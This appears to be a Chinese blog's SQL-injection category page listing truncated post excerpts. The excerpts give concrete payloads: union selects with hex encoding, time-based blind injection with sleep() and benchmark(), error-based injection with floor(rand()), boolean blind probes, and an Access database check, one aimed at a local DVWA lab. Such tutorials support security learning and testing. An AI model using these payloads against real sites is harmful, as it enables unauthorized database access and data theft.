随笔分类 - SQL注入
摘要:1.在本地测试的时候,发现一个错误哦 sql 注入进行查看所有数据库名的时候, 百度查看,说的是编码问题,本地测试还能改一下编码,实战怎么办~ 解决办法: 使用16进制进行读取 http://10.211.55.8:804/vulnerabilities/sqli/?id=1' union sele
阅读全文
摘要:SQL注释 单行注释 #后面直接加内容 --后面必须加空格 多行注释 /**/中间可跨行 -- + 会删除 内联注释是: MySQL数据库为了保持与其他数据库兼容,特意新添加的功能。 为了避免从MySQL中导出的SQL语句不能被其他数据库使用,它把一些 MySQL特有的语句放在 /*! ... */
阅读全文
摘要:注入ACCESS时,不能和MYSQL一样可以把表名爆出,只能一个一个去猜。 1.找到网站后,查看是否为ACCESS数据库。 构造payload URL+ and exists (select id from mysysaccessobjects) 返回正确,则为access数据库。 and (sel
阅读全文
摘要:1. 绕过payload : union select 1,2,unhex(hex(table_name)),4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_schema='cms' 采用了16进制编码
阅读全文
摘要:1.利用sleep() 函数进行注入 payload:and if(ascii(substr(database(),1,1))=115,1,sleep(5))%23 2.当错误的时候会有5秒的时间延时时利用benchmark()进行延时注入 payload:union select (if(subs
阅读全文
摘要:1.报错注入 payload: union select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a %23 2
阅读全文
摘要:1.利用left(database(),1)进行尝试 payload: left(version(),1)=5 查看一下version()查看数据库版本号第一位是不是5.返回结果正确。 2.看一下数据库的长度 payload:length(database())=8 当长度为8时,返回正确结果 3.
阅读全文
浙公网安备 33010602011771号